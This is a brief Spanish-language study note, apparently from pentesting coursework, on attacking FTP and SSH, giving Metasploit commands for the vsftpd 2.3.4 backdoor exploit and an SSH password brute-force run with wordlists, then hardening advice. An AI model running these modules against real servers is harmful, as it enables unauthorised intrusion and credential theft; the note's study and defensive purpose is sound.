# Explotacion de servicios FTP y SSH

## Index

* [## Explotacion de vulnerabilidades en FTP ](#ftp)
* [## Explotacion de vulnerabilidades en SSH ](#ssh)
* [## Practicas de seguridad ](#practicas)

## Explotacion de vulnerabilidades en FTP <a name="ftp"></a>

FTP es un protocolo de transferencia de archivos, que tiene varias vulnerabilidades.

* Acceso anonimo 
  * Si un servidor FTP permite acceso anonimo, cualquier usuario puede conectarse sin autenticacion
* Fuerza Bruta de credenciales 
* Comando en metasploit `search ftp`
  * `use exploit/unix/ftp/vsftp_234_backdoor`
  * `set RHOST` `set RPORT 21`
  * `exploit`

## Explotacion de vulnerabilidades en SSH <a name="ssh"></a>

Un protocolo para acceder de manera remota y segura a servidores 

* Autenticacion basada en contrasenia debil 
* Versiones antiguas y vulnerables 
* Ejemplo
  * `use auxiliary/scanner/ssh/ssh_login`
  * `set RHOSTS` 
  * `set USER_FILE/ruta/a/usuarios.txt`
  * `set PASS_file/ruta/a/contrasenias.txt`
  * `set THREADS 10`
  * `exploit`

## Practicas de seguridad <a name="practicas"></a>

* FTP 
  * Deshabilitar el acceso anonimo
  * Usar SFTP o FTPS que cifran conexiones 
* SSH 
  * Utilizar autenticacion basada en claves publicas 
  * Implementar Fail2Ban o un sistema similar para bloquear intentos de fuerza bruta
  * Deshabilitar veriosnes antiguas de SSH y cifrados inseguros
